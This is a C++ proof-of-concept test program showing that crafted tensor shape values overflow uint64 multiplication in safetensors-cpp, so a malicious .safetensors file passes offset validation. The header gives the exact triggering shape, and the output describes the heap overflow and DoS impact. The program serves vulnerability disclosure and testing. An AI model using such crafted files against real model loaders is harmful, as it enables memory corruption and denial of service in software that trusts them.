File size: 6,128 Bytes
/**
* test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
*
* This program loads a malicious .safetensors file where shape dimensions
* are crafted to overflow uint64 multiplication in get_shape_size().
*
* The file passes safetensors-cpp validation because:
* shape = [4194305, 4194305, 211106198978564]
* get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
* tensor_size = 4 * sizeof(F32) = 16 bytes
* data_offsets = [0, 16] -> data_size = 16 bytes
* tensor_size == data_size -> VALIDATION PASSES
*
* But the declared shape claims ~3.7 * 10^27 elements.
*
* IMPACT: Any code that trusts the shape for buffer allocation or iteration
* will either:
* (a) Attempt a massive allocation (DoS / OOM)
* (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
* (c) Iterate over wrong number of elements, causing OOB reads
*
* Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
*/
#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>
#include <iostream>
#include <limits>
#include "safetensors.hh"
/**
 * Computes the exact product of all dimensions in `shape` using 128-bit
 * arithmetic and reports whether it fits in a uint64_t.
 *
 * The accumulator saturates: as soon as it exceeds UINT64_MAX the function
 * stops multiplying, so `*product` is then only guaranteed to be greater than
 * UINT64_MAX (it is not necessarily the full product). Stopping early keeps the
 * 128-bit accumulator itself from wrapping on high-rank shapes; this assumes
 * each dimension is at most 64 bits wide.
 *
 * @param shape    Container of unsigned dimension values (e.g. tensor.shape).
 * @param product  Out: exact product when the function returns false.
 * @return true when the true product is larger than UINT64_MAX.
 */
template <typename Shape>
static bool shape_product_exceeds_u64(const Shape &shape, __uint128_t *product) {
  const __uint128_t u64_max = static_cast<__uint128_t>(UINT64_MAX);

  // A zero dimension makes the true product zero no matter how large the
  // other dimensions are, so check for it before saturating.
  for (const auto dim : shape) {
    if (dim == 0) {
      *product = 0;
      return false;
    }
  }

  __uint128_t acc = 1;
  for (const auto dim : shape) {
    acc *= static_cast<__uint128_t>(dim);
    if (acc > u64_max) {
      *product = acc;
      return true;
    }
  }
  *product = acc;
  return false;
}

/**
 * PoC driver: loads a .safetensors file, runs safetensors-cpp parsing and
 * offset validation on it, and reports for every tensor whether the product of
 * its shape dimensions overflows 64-bit arithmetic.
 *
 * @param argc  Argument count.
 * @param argv  argv[1], when present, overrides the default input path
 *              "overflow_tensor.safetensors".
 * @return 1 when the file cannot be opened, sized, read or parsed; 0 otherwise
 *         (including when validation fails or no overflow is found).
 */
int main(int argc, char *argv[]) {
  const char *filepath = "overflow_tensor.safetensors";
  if (argc > 1) {
    filepath = argv[1];
  }

  printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");

  // Read file into memory
  std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
  if (!ifs.is_open()) {
    fprintf(stderr, "Failed to open %s\n", filepath);
    return 1;
  }

  // tellg() reports failure as -1; converting that straight to size_t would
  // request an enormous allocation below.
  const std::streamoff end_pos = ifs.tellg();
  if (end_pos < 0) {
    fprintf(stderr, "Failed to determine size of %s\n", filepath);
    return 1;
  }
  const size_t filesize = static_cast<size_t>(end_pos);

  ifs.seekg(0);
  std::vector<uint8_t> data(filesize);
  if (filesize > 0 &&
      !ifs.read(reinterpret_cast<char *>(data.data()),
                static_cast<std::streamsize>(filesize))) {
    fprintf(stderr, "Failed to read %s\n", filepath);
    return 1;
  }
  ifs.close();
  printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);

  // Parse with safetensors-cpp
  safetensors::safetensors_t st;
  std::string warn, err;
  const bool ok = safetensors::load_from_memory(data.data(), data.size(),
                                                filepath, &st, &warn, &err);
  if (!ok) {
    printf("[!] load_from_memory FAILED: %s\n", err.c_str());
    return 1;
  }
  if (!warn.empty()) {
    printf("[!] Warnings: %s\n", warn.c_str());
  }
  printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");

  // Validate data offsets (this is the check that should catch overflow)
  std::string val_err;
  const bool valid = safetensors::validate_data_offsets(st, val_err);
  printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
  if (!valid) {
    printf(" Error: %s\n", val_err.c_str());
  }

  // Set when at least one tensor's true element count exceeds UINT64_MAX;
  // drives the final summary so it only claims what was actually observed.
  bool any_overflow = false;

  // Examine every tensor in the file
  for (size_t i = 0; i < st.tensors.size(); i++) {
    const std::string key = st.tensors.keys()[i];
    safetensors::tensor_t tensor;
    st.tensors.at(i, &tensor);

    printf("\n[*] Tensor: '%s'\n", key.c_str());
    // NOTE(review): the dtype label is hard-coded for the crafted PoC file;
    // the element size actually used below comes from get_dtype_bytes().
    printf(" dtype: F32\n");
    printf(" shape: [");
    for (size_t j = 0; j < tensor.shape.size(); j++) {
      if (j > 0) printf(", ");
      printf("%zu", tensor.shape[j]);
    }
    printf("]\n");
    printf(" data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);

    // Values as the library computes them (subject to 64-bit wraparound).
    const size_t shape_size = safetensors::get_shape_size(tensor);
    const size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
    const size_t tensor_size = dtype_bytes * shape_size;
    const size_t data_size = tensor.data_offsets[1] - tensor.data_offsets[0];

    // Ground truth: product over ALL dimensions (any rank), computed wide.
    __uint128_t true_product = 0;
    const bool overflowed = shape_product_exceeds_u64(tensor.shape, &true_product);

    // Floating-point approximation, used only to print the magnitude.
    double approx_elements = 1.0;
    for (const auto dim : tensor.shape) {
      approx_elements *= static_cast<double>(dim);
    }

    printf("\n [OVERFLOW ANALYSIS]\n");
    if (overflowed) {
      printf(" get_shape_size() = %zu (OVERFLOWED! True value: ~%.1e)\n", shape_size, approx_elements);
    } else {
      printf(" get_shape_size() = %zu (no overflow)\n", shape_size);
    }
    printf(" get_dtype_bytes() = %zu\n", dtype_bytes);
    printf(" tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
    printf(" data_size = %zu\n", data_size);
    printf(" tensor_size == data_size? %s\n",
           tensor_size == data_size ? "YES (validation passes!)" : "NO");

    // Demonstrate the danger: a naive consumer trusting shape
    printf("\n [IMPACT DEMONSTRATION]\n");
    printf(" A consumer that trusts shape dimensions would compute:\n");
    printf(" product of shape dimensions = ");
    if (overflowed) {
      printf("OVERFLOW (too large for uint64)\n");
    } else {
      printf("%llu\n", static_cast<unsigned long long>(true_product));
    }
    printf(" True product > UINT64_MAX: %s\n", overflowed ? "YES" : "NO");

    // Simulate what a consumer would do
    printf("\n [SIMULATED CONSUMER BEHAVIOR]\n");

    // Scenario 1: consumer sizes its buffer from the shape with plain size_t
    // math. The multiplication is deliberately unchecked: it reproduces the
    // same wraparound as the library.
    size_t alloc_size = 1;
    for (const auto dim : tensor.shape) {
      alloc_size *= dim;
    }
    alloc_size *= dtype_bytes;

    if (!overflowed) {
      printf(" Consumer alloc: %zu bytes (element count did not overflow)\n", alloc_size);
      continue;
    }
    any_overflow = true;

    printf(" Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
    printf(" Consumer thinks tensor has: ");
    for (size_t j = 0; j < tensor.shape.size(); j++) {
      if (j > 0) printf(" * ");
      printf("%zu", tensor.shape[j]);
    }
    printf(" = ~%.1e elements\n", approx_elements);

    // Describe the mismatch between the wrapped allocation size and the
    // number of elements the declared shape claims.
    printf("\n If consumer allocates %zu bytes but iterates over every declared element:\n", alloc_size);
    printf(" -> HEAP BUFFER OVERFLOW (writing ~%.1e * %zu bytes into %zu byte buffer)\n",
           approx_elements, dtype_bytes, alloc_size);
    printf(" This is a critical memory safety vulnerability.\n");
  }

  printf("\n=== DIFFERENTIAL RESULT ===\n");
  if (any_overflow && valid) {
    printf(" Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
    printf(" C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
    printf(" Impact: A model file that Rust deems invalid is accepted by C++\n");
    printf(" The shape values cause integer overflow, enabling heap corruption\n");
  } else if (any_overflow) {
    printf(" C++ (safetensors-cpp): shape overflow present, but validate_data_offsets FAILED\n");
    printf(" The overflow was not accepted by validation for this input\n");
  } else {
    printf(" No tensor in this file has a shape product exceeding UINT64_MAX\n");
    printf(" The overflow condition was not reproduced with this input\n");
  }
  return 0;
}
|